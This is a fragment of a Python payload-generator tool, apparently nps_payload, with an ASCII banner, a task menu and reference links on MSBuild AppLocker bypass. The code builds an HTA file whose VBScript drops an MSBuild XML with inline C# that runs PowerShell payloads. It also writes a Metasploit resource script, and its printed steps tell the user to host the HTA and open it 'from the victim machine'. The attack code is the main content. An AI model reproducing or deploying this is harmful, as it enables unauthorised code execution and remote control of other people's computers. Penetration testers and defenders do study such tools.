    "                }" & vbCrLf &_
    "                if (output != null)" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    foreach (PSObject rtnItem in output)" & vbCrLf &_
    "                    {" & vbCrLf &_
    "                        Console.WriteLine(rtnItem.ToString());" & vbCrLf &_
    "                    }" & vbCrLf &_
    "                }" & vbCrLf &_
    "                return true;" & vbCrLf &_
    "            }" & vbCrLf &_
    "" & vbCrLf &_
    "            public static string Base64Encode(string text) {" & vbCrLf &_
    "           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" & vbCrLf &_
    "        }" & vbCrLf &_
    "" & vbCrLf &_
    "        public static string Base64Decode(string encodedtext) {" & vbCrLf &_
    "            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" & vbCrLf &_
    "        }" & vbCrLf &_
    "        }" & vbCrLf &_
    "        ]]>" & vbCrLf &_
    "      </Code>" & vbCrLf &_
    "    </Task>" & vbCrLf &_
    "  </UsingTask>" & vbCrLf &_
    "</Project>"
    Set objFile = objFSO.CreateTextFile(objTemp & "\\resource" & x & ".xml", True)
    objFile.WriteLine(msbuildXML)
    objFile.Close
  End Function
</script>""" % psh_payloads)

  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")  
  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.hta")
  print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  print("2. Deploy hta file to web server and navigate from the victim machine.")
  print("3. Hack the Planet!!")

  sys.exit()

# Exit Program
def quit():
  sys.exit(0)


# Main guts
def main():
  print("""
                                     (            (
                              ) (    )\        )  )\ )
  (    `  )  (       `  )  ( /( )\ )((_)(   ( /( (()/(
  )\ ) /(/(  )\      /(/(  )(_)|()/( _  )\  )(_)) ((_)
 _(_/(((_)_\((_)    ((_)_\((_)_ )(_)) |((_)((_)_  _| |
| ' \)) '_ \|_-<    | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
      |_|     |_____|_|         |__/

                       v1.03
""")

  while(1):
    # Display options to the user
    print("\n\t(1)\tGenerate msbuild/nps/msf payload")
    print("\t(2)\tGenerate msbuild/nps/msf HTA payload")
    print("\t(99)\tQuit")

    options = {1: generate_msbuild_nps_msf_payload,
               2: generate_msbuild_nps_msf_hta_payload,
               99: quit,
    }
    # raw_input() returns a string on both Python versions; int() it so the
    # options lookup works (Python 3's input() would hand back "1", not 1)
    try:
      task = int(raw_input("\nSelect a task: "))
    except ValueError:
      continue
    if task in options:
      options[task]()


# Standard boilerplate to call the main() function
if __name__ == '__main__':
  main()

references used:

  • https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
  • https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/

Author: Jacco Straathof